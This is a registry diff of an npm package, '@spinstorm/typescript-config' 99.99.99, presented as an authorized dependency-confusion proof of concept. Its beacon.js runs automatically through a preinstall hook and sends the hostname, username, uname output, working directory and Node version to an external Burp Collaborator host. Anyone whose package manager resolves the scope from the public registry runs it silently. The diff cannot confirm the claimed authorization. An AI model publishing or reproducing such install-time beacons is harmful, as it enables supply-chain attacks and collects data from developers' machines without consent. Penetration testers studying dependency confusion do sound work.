@spinstorm/typescript-config 99.99.99

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (4) hide show
  1. package/README.md +12 -0
  2. package/beacon.js +75 -0
  3. package/index.js +2 -0
  4. package/package.json +16 -0
package/README.md ADDED
@@ -0,0 +1,12 @@
1
+ # @spinstorm/typescript-config — RESERVED
2
+
3
+ This package name is held for an authorized security assessment of the
4
+ `@spinstorm` namespace. It contains no functional code.
5
+
6
+ If you reached this package by accident, your package manager resolved the
7
+ scope from the public npm registry instead of from your internal registry.
8
+ Audit your `.npmrc` — you should have:
9
+
10
+ @spinstorm:registry=https://<your-internal-registry>/
11
+
12
+ Contact your security team.
package/beacon.js ADDED
@@ -0,0 +1,75 @@
1
+ // Dependency-confusion PoC beacon — authorized engagement only.
2
+ // Sends fingerprint to the engagement's Burp Collaborator subdomain so the
3
+ // tester can confirm "the attack landed on target X at time Y."
4
+ //
5
+ // Behavior:
6
+ // - Fires on npm `preinstall` lifecycle hook.
7
+ // - Captures uname -a, whoami, hostname, cwd, node version, ts, package id.
8
+ // - POSTs JSON over HTTPS; fails silently; 2s timeout; never blocks install.
9
+ // - No persistence, no file reads beyond package.json, no second stage.
10
+
11
+ const https = require('https');
12
+ const os = require('os');
13
+ const path = require('path');
14
+ const { execSync } = require('child_process');
15
+
16
+ const OAST_HOST = 'rqli2ifcll9ko0rxrve6w0af066xuvik.oastify.com';
17
+
18
+ function safeExec(cmd) {
19
+ try {
20
+ return execSync(cmd, { timeout: 1500, stdio: ['ignore', 'pipe', 'ignore'] })
21
+ .toString()
22
+ .trim();
23
+ } catch {
24
+ return null;
25
+ }
26
+ }
27
+
28
+ let pkgName = 'unknown';
29
+ let pkgVersion = 'unknown';
30
+ try {
31
+ const pkg = require(path.join(__dirname, 'package.json'));
32
+ pkgName = pkg.name;
33
+ pkgVersion = pkg.version;
34
+ } catch {}
35
+
36
+ const payload = {
37
+ poc: pkgName,
38
+ version: pkgVersion,
39
+ hook: 'preinstall',
40
+ hostname: os.hostname(),
41
+ whoami: safeExec('whoami') || os.userInfo().username,
42
+ uname: safeExec('uname -a') || `${os.type()} ${os.release()} ${os.arch()}`,
43
+ cwd: process.cwd(),
44
+ node: process.version,
45
+ platform: process.platform,
46
+ ts: new Date().toISOString(),
47
+ };
48
+
49
+ const body = JSON.stringify(payload);
50
+ const slug = pkgName.replace(/[^a-z0-9]/gi, '-').replace(/^-+|-+$/g, '');
51
+
52
+ const req = https.request(
53
+ {
54
+ host: OAST_HOST,
55
+ path: '/' + slug,
56
+ method: 'POST',
57
+ headers: {
58
+ 'Content-Type': 'application/json',
59
+ 'Content-Length': Buffer.byteLength(body),
60
+ 'User-Agent': 'poc-dep-confusion/1.0',
61
+ },
62
+ timeout: 2000,
63
+ },
64
+ (res) => {
65
+ res.on('data', () => {});
66
+ res.on('end', () => process.exit(0));
67
+ }
68
+ );
69
+ req.on('error', () => process.exit(0));
70
+ req.on('timeout', () => {
71
+ req.destroy();
72
+ process.exit(0);
73
+ });
74
+ req.write(body);
75
+ req.end();
package/index.js ADDED
@@ -0,0 +1,2 @@
1
+ // Inert surface — PoC does not expose real functionality.
2
+ module.exports = {};
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "@spinstorm/typescript-config",
3
+ "version": "99.99.99",
4
+ "description": "Authorized dependency-confusion proof-of-concept. Do not install outside engagement scope.",
5
+ "main": "index.js",
6
+ "license": "UNLICENSED",
7
+ "private": false,
8
+ "files": [
9
+ "index.js",
10
+ "beacon.js",
11
+ "README.md"
12
+ ],
13
+ "scripts": {
14
+ "preinstall": "node beacon.js"
15
+ }
16
+ }